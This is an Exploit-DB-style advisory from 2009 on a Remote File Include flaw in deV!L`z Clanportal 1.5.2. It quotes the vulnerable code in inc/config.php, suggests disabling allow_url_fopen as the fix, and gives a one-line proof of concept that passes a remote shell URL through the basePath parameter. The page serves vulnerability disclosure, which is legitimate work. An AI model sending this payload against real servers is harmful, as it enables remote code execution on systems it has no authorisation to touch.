deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

vendor:

deV!L`z Clanportal 1.5.2

by:

cr4wl3r

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: deV!L`z Clanportal 1.5.2

Affected Version From: 1.5.2

Affected Version To: 1.5.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

deV!L`z Clanportal 1.5.2 is vulnerable to a Remote File Include vulnerability. This vulnerability is caused due to the use of user-supplied input without proper validation. A remote attacker can exploit this vulnerability to include a remote file containing malicious code and execute it in the context of the webserver process. The PoC provided allows an attacker to include a remote file containing malicious code and execute it in the context of the webserver process.

Mitigation:

Change php.ini and set allow_url_fopen to Off

Source

Exploit-DB raw data:

[+]  deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: http://www.dzcp.de/downloads/?action=download&id=131
[x] Code in [dzcp1.5.2/inc/config.php]

## REQUIRES ##
require_once($basePath."/inc/mysql.php");  <--- RFI

function show($tpl, $array)
{
  global $tmpdir;
    $template = "../inc/_templates_/".$tmpdir."/".$tpl;
  
    if($fp = @fopen($template.".".html, "r"))
      $tpl = @fread($fp, filesize($template.".".html));
    
    $array['dir'] = '../inc/_templates_/'.$tmpdir;
    foreach($array as $value => $code)
    {
      $tpl = str_replace('['.$value.']', $code, $tpl);
    }
  return $tpl;
}

[+] PoC: [path]/inc/config.php?basePath=[Shell]

[+] Solution: Change php.ini and set allow_url_fopen to Off